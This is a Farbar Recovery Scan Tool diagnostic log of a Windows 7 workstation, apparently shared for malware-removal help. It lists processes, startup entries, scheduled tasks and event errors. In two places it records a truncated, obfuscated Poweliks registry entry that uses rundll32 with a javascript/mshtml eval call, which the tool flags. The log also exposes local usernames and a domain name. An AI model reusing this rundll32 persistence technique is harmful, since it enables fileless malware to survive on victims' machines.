15.4.3508.1109 - Microsoft Corporation) Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation) WinRAR 5.20 beta 2 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.2 - win.rar GmbH) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-1619941995-4271792153-444280415-1167_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 31-10-2014 21:31:22 Windows Update 03-11-2014 20:03:36 Windows Update 03-11-2014 20:04:07 Windows Update 03-11-2014 20:05:33 Windows Update ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2014-11-03 14:48 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {0A562D10-42B3-4B37-8DD8-F826ADD2CD0F} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1245 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1245" "$(Arg0)" Task: {1BF18B5B-38B8-4F14-A944-1C521D9431B4} - System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation) Task: {26F13908-B242-4EDE-8244-B202FC3A196E} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1265 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1265" "$(Arg0)" Task: {2F223DDA-408A-4FF7-B091-A4F4BC686A23} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1003 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1003" "$(Arg0)" Task: {34413358-051F-42CA-BB6F-0B7E492A084C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1000 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1000" "$(Arg0)" Task: {39129A2A-0E8E-4DEE-AFD2-C2C396CC5558} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1429 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1429" "$(Arg0)" Task: {6401F1FD-7EE1-4874-8C33-2A32FD019610} - System32\Tasks\WSCEAA => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\RemoteManagement\WSCEAA.exe [2012-10-17] (Wave Systems Corp.) Task: {7C98D515-88D0-48B0-9BBC-571271F39C98} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1244 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1244" "$(Arg0)" Task: {937498CF-F3C6-42F0-95A3-2C0FEBB7B492} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {952F0C0C-CAE5-4A9F-8511-841E2A5C5E14} - System32\Tasks\NIUpdateServiceCheckTask => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [2012-11-16] (National Instruments) Task: {A4AC7ECA-B910-42F4-BA10-263A0104BFA0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated) Task: {AD332114-26E0-4546-8872-302B310DA61C} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1246 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1246" "$(Arg0)" Task: {BA0DEFBB-D99E-4EA3-A5EF-A85921CBC8AE} - System32\Tasks\Microsoft\Windows\PLA\KCTR$1247 => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "KCTR$1247" "$(Arg0)" Task: {C6D0C48E-F99E-4C1A-9747-9225A41CD745} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\Defrag.job => C:\Windows\system32\Defrag.exe ==================== Loaded Modules (whitelisted) ============= 2010-01-20 06:49 - 2010-01-20 06:49 - 00027648 _____ () C:\Windows\System32\sdo2ml6.dll 2013-01-24 11:07 - 2013-01-24 11:07 - 00824832 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\sdo2mdu.dll 2014-06-03 08:34 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2012-11-20 07:52 - 2012-11-20 07:52 - 00225720 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe 2012-11-20 07:51 - 2012-11-20 07:51 - 00038840 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\DeviceStatus.dll 2012-11-23 17:34 - 2012-11-23 17:34 - 00020480 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe 2013-02-20 17:07 - 2013-10-28 18:38 - 00097568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-10-21 09:33 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2014-01-15 09:33 - 2014-01-15 09:33 - 00293376 _____ () C:\Windows\system32\CHookExt.dll 2013-02-20 16:56 - 2012-02-01 16:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2013-01-28 12:08 - 2013-01-28 12:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-01-28 12:08 - 2013-01-28 12:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2013-09-10 09:26 - 2013-09-10 09:26 - 02214912 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtCore_2012.dll 2013-09-10 09:26 - 2013-09-10 09:26 - 08044544 _____ () C:\Program Files (x86)\National Instruments\Shared\LabVIEW Run-Time\2012\NIQtGui_2012.dll 2012-01-26 08:36 - 2012-01-26 08:36 - 00278528 ____R () C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\xerces-depdom_2_6.dll 2013-05-29 11:36 - 2013-05-29 11:36 - 01958560 _____ () C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\niwsrp.dll 2014-09-24 22:12 - 2014-09-24 22:12 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll 2013-09-11 00:34 - 2014-10-27 21:01 - 03649648 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Audible Download Manager.lnk => C:\Windows\pss\Audible Download Manager.lnk.CommonStartup MSCONFIG\startupreg: 1135n Scan2PC => "C:\Windows\twain_32\Dell\Dell1135\Scan2Pc.exe" MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: TdmNotify => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe ========================= Accounts: ========================== Administrator (S-1-5-21-2032665127-3746338806-4175205368-500 - Administrator - Disabled) Guest (S-1-5-21-2032665127-3746338806-4175205368-501 - Limited - Disabled) UpdatusUser (S-1-5-21-2032665127-3746338806-4175205368-1000 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Faulty Device Manager Devices ============= Name: Control Vault w/ Fingerprint Swipe Sensor Description: Control Vault w/ Fingerprint Swipe Sensor Class Guid: {53d29ef7-377c-4d14-864b-eb3a85769359} Manufacturer: Broadcom Corporation Service: WUDFRd Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. Name: Broadcom Usbccid Smartcard Reader (WUDF) Description: Broadcom Usbccid Smartcard Reader (WUDF) Class Guid: {50dd5230-ba8a-11d1-bf5d-0000f805f530} Manufacturer: Broadcom Service: WUDFRd Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. ==================== Event log errors: ========================= Application errors: ================== Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: ) Description: The Windows logon process has unexpectedly terminated. Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_RpcEptMapper, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1 Faulting module name: rpcss.dll, version: 6.1.7601.17514, time stamp: 0x4ce7c970 Exception code: 0xc0000005 Fault offset: 0x00000000000646ac Faulting process id: 0x3cc Faulting application start time: 0xsvchost.exe_RpcEptMapper0 Faulting application path: svchost.exe_RpcEptMapper1 Faulting module path: svchost.exe_RpcEptMapper2 Report Id: svchost.exe_RpcEptMapper3 Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 50279 Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 50279 Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 998 Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 998 Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 4134 System errors: ============= Error: (11/04/2014 09:43:14 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/04/2014 09:42:43 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: ADC1104) Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator. Error: (11/04/2014 09:23:58 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: The handle is invalid.Broadcom Corp Contacted SmartCard 0GET_STATEXX XX XX XX Error: (11/04/2014 09:08:35 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY) Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator. Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The WvPCR service depends on the TPM Base Services service which failed to start because of the following error: %%0 Error: (11/04/2014 09:08:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The SI TSS v1.2.1.41 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Error: (11/04/2014 09:08:07 AM) (Source: NETLOGON) (EventID: 5719) (User: ) Description: This computer was not able to set up a secure session with a domain controller in domain ADC1104 due to the following: %%1311 This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator. ADDITIONAL INFO If this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain. Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Remote Procedure Call (RPC) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Reboot the machine. Error: (11/04/2014 09:04:03 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The RPC Endpoint Mapper service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service. Error: (11/04/2014 09:00:01 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY) Description: The processing of Group Policy failed. Windows attempted to read the file \\adc.com\SysVol\adc.com\Policies\{97A64E57-5354-4D99-8398-66406F78FA5A}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following: a) Name Resolution/Network Connectivity to the current domain controller. b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller). c) The Distributed File System (DFS) client has been disabled. Microsoft Office Sessions: ========================= Error: (11/04/2014 09:08:09 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/04/2014 09:06:05 AM) (Source: Winlogon) (EventID: 4005) (User: ) Description: Error: (11/04/2014 09:04:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe_RpcEptMapper6.1.7600.163854a5bc3c1rpcss.dll6.1.7601.175144ce7c970c000000500000000000646ac3cc01cff7ae99170b7eC:\Windows\system32\svchost.exec:\windows\system32\rpcss.dll6e65f048-642b-11e4-a9a8-b8ca3ad1aa18 Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 50279 Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 50279 Error: (11/04/2014 08:59:56 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 998 Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 998 Error: (11/04/2014 08:59:07 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (11/04/2014 05:24:10 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 4134 ==================== Memory info =========================== Processor: Intel® Core i5-3320M CPU @ 2.60GHz Percentage of memory in use: 70% Total physical RAM: 6015.18 MB Available physical RAM: 1766.91 MB Total Pagefile: 12028.55 MB Available Pagefile: 7572.97 MB Total Virtual: 8192 MB Available Virtual: 8191.84 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:118.46 GB) (Free:49.89 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 119.2 GB) (Disk ID: D7B04F5B) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=752 MB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=118.5 GB) - (Type=07 NTFS) ==================== End Of Log ============================
  8. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014 Ran by bcostello (administrator) on ADC69 on 04-11-2014 10:01:11 Running from C:\Users\rbecker\Desktop Loaded Profiles: rbecker & bcostello & UpdatusUser (Available profiles: rbecker & kmitchell & bcostello & Administrator & UpdatusUser) Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 9 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe (Logitech, Inc.) C:\Program Files\Logitech\SolarApp\L4301_Solar.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe (Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe (National Instruments Corporation) C:\Windows\SysWOW64\lkads.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE (National Instruments Corporation) C:\Program Files (x86)\National Instruments\MAX\nimxs.exe (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVCM.EXE (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe (O2Micro International) C:\Windows\System32\o2flash.exe () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer_Service.exe (Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe (National Instruments, Inc.) C:\Windows\SysWOW64\lkcitdl.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (National Instruments Corporation) C:\Windows\SysWOW64\lktsrv.exe (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Authentec Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe (National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Creative Technology Ltd) C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe (Nikon Corporation) C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Microsoft Corporation) C:\Windows\System32\mobsync.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [682904 2012-09-19] (Alps Electric Co., Ltd.) HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-02-13] (IDT, Inc.) HKLM\...\Run: [intelPROSet] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [4805936 2012-08-23] (Intel® Corporation) HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2916584 2010-08-12] (ESET) HKLM\...\Run: [Conisio Login Manager] => C:\Program Files\SolidWorks Enterprise PDM\EdmServer.exe [1614336 2014-01-15] (Dassault Systemes SolidWorks Corp.) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation) HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [462974 2011-12-16] (Creative Technology Ltd) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [38984 2013-05-10] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840768 2013-05-10] (Adobe Systems Inc.) HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [571392 2011-10-30] (Nikon Corporation) HKLM-x32\...\Run: [NI Update Service] => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [853640 2012-11-16] (National Instruments) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (Authentec Inc.) HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...\MountPoints2: {c8e9ef48-7ba9-11e2-8a3a-806e6f6e6963} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\contents_TGSG2\setup.htm HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-21-1619941995-4271792153-444280415-3256\...\Run: [NIRegistrationWizard] => C:\Program Files (x86)\National Instruments\Shared\RegistrationWizard\Bin\RegistrationWizard.exe [846520 2010-06-21] () AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [184048 2013-12-04] (NVIDIA Corporation) AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [156256 2013-12-04] (NVIDIA Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NI Error Reporting.lnk ShortcutTarget: NI Error Reporting.lnk -> C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe (National Instruments Corporation) Startup: C:\Users\kmitchell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation) Startup: C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation) ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.) ShellIconOverlayIdentifiers: [uninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.) BootExecute: autocheck autochk * bootdelete ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xCB8CB9EA9BF7CF01 HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-1619941995-4271792153-444280415-1167\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-1619941995-4271792153-444280415-3256\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe SearchScopes: HKLM - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS SearchScopes: HKLM-x32 - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = 